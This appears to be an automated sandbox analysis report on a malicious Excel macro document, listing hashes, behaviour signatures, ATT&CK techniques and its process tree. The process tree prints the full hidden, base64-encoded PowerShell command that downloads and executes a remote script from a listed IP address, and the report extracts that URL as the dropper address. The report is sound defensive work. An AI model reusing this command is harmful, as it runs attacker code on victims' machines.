Analysis

  • max time kernel
    144s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2022 01:10

General

  • Target

    TRUE_doc.xls

  • Size

    38KB

  • MD5

    6b77a4c21a8ef90057c12cd41aa8fa51

  • SHA1

    82d0a47baa5e7a44a28315739a4a517a56ca3942

  • SHA256

    c19c1e39b5f614db3380b72dfb98fbe25ef4ed77bf3ac52055a1239a31a42519

  • SHA512

    6c42cb9f7be0df0dc45c2fcb6a335696c7bb05f03a8521c155b50bf32421256155e98df1832d7b26959ab2c3fac2085405d2d06d43fd79d777e527029299c974

  • SSDEEP

    768:glknKpbdrHYrMue8q7QPX+5xtekEd/68/dgALAoW8NFdU5PX+SSL0LHVfDM:gluKpbdrHYrMue8q7QPX+5xtekEdi8/V

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://78.85.17.88:8912/rev.ps1

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\TRUE_doc.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powERShEll.eXe -nop -w hiDDen -e cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIAB0AGUAcwB0ACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwB0AGUAcwB0ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA3ADgALgA4ADUALgAxADcALgA4ADgAOgA4ADkAMQAyAC8AcgBlAHYALgBwAHMAMQAnACkA
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4436
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powERShEll.eXe -nop -w hiDDen -e cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIAB0AGUAcwB0ACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwB0AGUAcwB0ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA3ADgALgA4ADUALgAxADcALgA4ADgAOgA4ADkAMQAyAC8AcgBlAHYALgBwAHMAMQAnACkA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4368

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4368-149-0x00007FFD466A0000-0x00007FFD47161000-memory.dmp
    Filesize

    10.8MB

  • memory/4368-148-0x00007FFD466A0000-0x00007FFD47161000-memory.dmp
    Filesize

    10.8MB

  • memory/4368-143-0x00007FFD466A0000-0x00007FFD47161000-memory.dmp
    Filesize

    10.8MB

  • memory/4368-141-0x000001EB961D0000-0x000001EB961F2000-memory.dmp
    Filesize

    136KB

  • memory/4368-140-0x0000000000000000-mapping.dmp
  • memory/4436-139-0x0000000000000000-mapping.dmp
  • memory/4916-136-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp
    Filesize

    64KB

  • memory/4916-138-0x00007FFD2D9C0000-0x00007FFD2D9D0000-memory.dmp
    Filesize

    64KB

  • memory/4916-137-0x00007FFD2D9C0000-0x00007FFD2D9D0000-memory.dmp
    Filesize

    64KB

  • memory/4916-132-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp
    Filesize

    64KB

  • memory/4916-135-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp
    Filesize

    64KB

  • memory/4916-145-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp
    Filesize

    64KB

  • memory/4916-144-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp
    Filesize

    64KB

  • memory/4916-146-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp
    Filesize

    64KB

  • memory/4916-147-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp
    Filesize

    64KB

  • memory/4916-134-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp
    Filesize

    64KB

  • memory/4916-133-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp
    Filesize

    64KB